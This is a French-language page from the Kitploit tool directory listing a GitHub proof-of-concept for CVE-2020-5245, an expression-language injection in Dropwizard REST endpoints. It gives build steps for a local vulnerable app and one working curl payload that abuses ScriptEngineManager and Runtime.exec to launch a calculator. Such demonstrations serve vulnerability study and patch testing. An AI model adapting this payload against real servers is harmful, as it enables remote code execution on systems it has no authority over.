Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-5245 — Exploit de preuve de concept pour CVE-2020-5245, démontrant une injection d'expression de langage dans les points de terminaison REST Dropwizard via des paramètres HTTP conçus. | Kitploit
Outils/GitHubGitHub/lycshub/cve-2020-5245
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHublycshub/cve-2020-5245

CVE-2020-5245

Exploit de preuve de concept pour CVE-2020-5245, démontrant une injection d'expression de langage dans les points de terminaison REST Dropwizard via des paramètres HTTP conçus.

Voir le dépôt
4il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-5245

  1. Exécutez mvn clean install pour construire votre application
  2. Démarrez l'application avec java -jar target/dropwizard-1.0-SNAPSHOT.jar server config.yml
  3. Pour vérifier que votre application est en cours d'exécution, saisissez l'URL http://localhost:8080

Certaines erreurs dans les plugins de pom.xml n'ont pas été affectées. Reproduire

Reproduire

curl http://localhost:8080/bookService/selfValidatingBeanParam?answer=${%27%27.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22java.lang.Runtime.getRuntime().exec(%27/usr/bin/gnome-calculator%27)%22)}

Télécharger l’outil